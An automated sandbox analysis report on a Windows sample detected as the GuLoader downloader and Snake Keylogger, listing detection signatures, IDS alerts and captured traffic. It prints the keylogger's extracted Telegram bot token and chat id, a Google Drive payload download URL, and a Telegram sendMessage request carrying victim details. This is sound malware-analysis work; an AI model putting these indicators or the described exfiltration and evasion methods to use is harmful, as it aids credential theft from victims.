
Windows Analysis Report
OW1i3n5K3s.exe

Overview

General Information

Sample name: OW1i3n5K3s.exe (renamed because original name is a hash value)
Original sample name: 702ceddaa83348514f637a06c19a476999b3a391a7de4fc49efe9fa368fcaa62.exe
Analysis ID: 1632404
MD5: 20a7c8112e5876adb90550f2fe0c78de
SHA1: 1671082a2bf6cb091364ac4c8520c20aefc7cb8a
SHA256: 702ceddaa83348514f637a06c19a476999b3a391a7de4fc49efe9fa368fcaa62
Tags: exe, signed, VIPKeylogger, user-adrian__luca

Detection

Detection: GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • OW1i3n5K3s.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\OW1i3n5K3s.exe" MD5: 20A7C8112E5876ADB90550F2FE0C78DE)
    • OW1i3n5K3s.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\OW1i3n5K3s.exe" MD5: 20A7C8112E5876ADB90550F2FE0C78DE)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware configuration (Snake Keylogger): {"Exfil Mode": "Telegram", "Token": "8118244750:AAHW9qN4qIFfpwTeDTPtn27qicq6nUcMbog", "Chat_id": "1767942457", "Version": "4.4"}
Source | Rule | Description | Author
00000008.00000002.2505212840.0000000032F8B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000008.00000002.2476092324.000000000186B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000001.00000002.1342316405.00000000053BB000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: OW1i3n5K3s.exe PID: 8128 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T23:29:31.198037+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49725 | 104.21.32.1 | 443 | TCP
2025-03-07T23:29:37.835009+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49729 | 104.21.32.1 | 443 | TCP
2025-03-07T23:29:44.019332+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.32.1 | 443 | TCP
2025-03-07T23:29:26.132095+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T23:29:28.907714+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T23:29:32.392043+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49726 | 132.226.8.169 | 80 | TCP
2025-03-07T23:29:18.712874+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49720 | 142.250.184.206 | 443 | TCP
2025-03-07T23:29:58.106064+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 149.154.167.220 | 443 | TCP


            AV Detection

            Source: 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8118244750:AAHW9qN4qIFfpwTeDTPtn27qicq6nUcMbog", "Chat_id": "1767942457", "Version": "4.4"}
Source: OW1i3n5K3s.exeVirustotal: Detection: 74%
Source: OW1i3n5K3s.exeReversingLabs: Detection: 65%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361787A8 CryptUnprotectData,8_2_361787A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36178EF1 CryptUnprotectData,8_2_36178EF1
            Source: OW1i3n5K3s.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: OW1i3n5K3s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00402910 FindFirstFileW,1_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_004069DF FindFirstFileW,FindClose,1_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D8E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00402910 FindFirstFileW,8_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_004069DF FindFirstFileW,FindClose,8_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405D8E
Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user
Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 0258FC19h8_2_0258F961
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 0258F45Dh8_2_0258F2C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 0258F45Dh8_2_0258F4AC
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F83308h8_2_35F82EF0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F82D41h8_2_35F82A90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8D069h8_2_35F8CDC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8FBD9h8_2_35F8F930
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8F781h8_2_35F8F4D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8F329h8_2_35F8F080
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_35F80040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8EED1h8_2_35F8EC28
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8EA79h8_2_35F8E7D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8E621h8_2_35F8E378
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F80D0Dh8_2_35F80B30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F816F8h8_2_35F80B30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8E1C9h8_2_35F8DF20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F83308h8_2_35F82EE7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8DD71h8_2_35F8DAC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8D919h8_2_35F8D670
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F83308h8_2_35F83236
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8D4C1h8_2_35F8D218
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361748C9h8_2_36174620
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36177EB5h8_2_36177B78
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36179280h8_2_36178FB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36176CC1h8_2_36176A18
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617ACCFh8_2_3617AA00
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361732B1h8_2_36173008
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361762D9h8_2_36176030
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617DEFFh8_2_3617DC30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36179F1Fh8_2_36179C50
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36171CF9h8_2_36171A50
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617BF0Fh8_2_3617BC40
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361702E9h8_2_36170040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617F13Fh8_2_3617EE70
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36177119h8_2_36176E70
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36174D21h8_2_36174A78
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36173709h8_2_36173460
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617B15Fh8_2_3617AE90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36170741h8_2_36170498
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617D14Fh8_2_3617CE80
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36176733h8_2_36176488
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36172151h8_2_36171EA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36175179h8_2_36174ED0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617C39Fh8_2_3617C0D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617E38Fh8_2_3617E0C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36177571h8_2_361772C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36170B99h8_2_361708F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617A3AFh8_2_3617A0E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617D5DFh8_2_3617D310
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361725A9h8_2_36172300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617F5CFh8_2_3617F300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617B5EFh8_2_3617B320
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361779C9h8_2_36177720
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361755D1h8_2_36175328
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617E81Fh8_2_3617E550
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36172A01h8_2_36172758
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36170FF1h8_2_36170D48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617A83Fh8_2_3617A570
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617C82Fh8_2_3617C560
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617FA5Fh8_2_3617F790
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36175A29h8_2_36175780
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36172E59h8_2_36172BB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617BA7Fh8_2_3617B7B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36171449h8_2_361711A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617DA6Fh8_2_3617D7A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36175E81h8_2_36175BD8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36179A8Fh8_2_361797C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617CCBFh8_2_3617C9F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361718A1h8_2_361715F8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617ECAFh8_2_3617E9E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E4E18h8_2_361E4B20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E1517h8_2_361E1248
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E52E0h8_2_361E4FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E2BE7h8_2_361E2918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EBC10h8_2_361EB918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E9108h8_2_361E8E10
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6600h8_2_361E6308
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ED3F8h8_2_361ED100
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3507h8_2_361E3238
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ECF30h8_2_361ECC38
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EA428h8_2_361EA130
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E0BF7h8_2_361E0928
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E7920h8_2_361E7628
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EE718h8_2_361EE420
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3E27h8_2_361E3B58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EE250h8_2_361EDF58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EB748h8_2_361EB450
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E8C40h8_2_361E8948
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E02E7h8_2_361E0040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6138h8_2_361E5E40
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EFA38h8_2_361EF740
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E47E8h8_2_361E4478
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E5C70h8_2_361E5978
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EF570h8_2_361EF278
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ECA68h8_2_361EC770
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E1E37h8_2_361E1B68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E9F60h8_2_361E9C68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E7458h8_2_361E7160
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E0767h8_2_361E0498
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6F90h8_2_361E6C98
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EDD88h8_2_361EDA90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E2757h8_2_361E2488
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EB280h8_2_361EAF88
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E8778h8_2_361E8480
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E1087h8_2_361E0DB8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E82B0h8_2_361E7FB8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E57A8h8_2_361E54B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EF0A8h8_2_361EEDB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3078h8_2_361E2DA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EC5A0h8_2_361EC2A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E9A98h8_2_361E97A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E19A7h8_2_361E16D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E95D0h8_2_361E92D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6AC8h8_2_361E67D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3997h8_2_361E36C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ED8C0h8_2_361ED5C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EADB8h8_2_361EAAC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E22C7h8_2_361E1FF8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EA8F0h8_2_361EA5F8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E7DE8h8_2_361E7AF0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E42B7h8_2_361E3FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EEBE1h8_2_361EE8E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EC0D8h8_2_361EBDE0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_3620F228
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_3620F21A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_3620F53E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36210800h8_2_36210508
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36210338h8_2_36210040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_36242A80
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_36242A21
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_36242A70

            Networking

            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49740 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49723 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49729 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49725 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 142.250.184.206:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
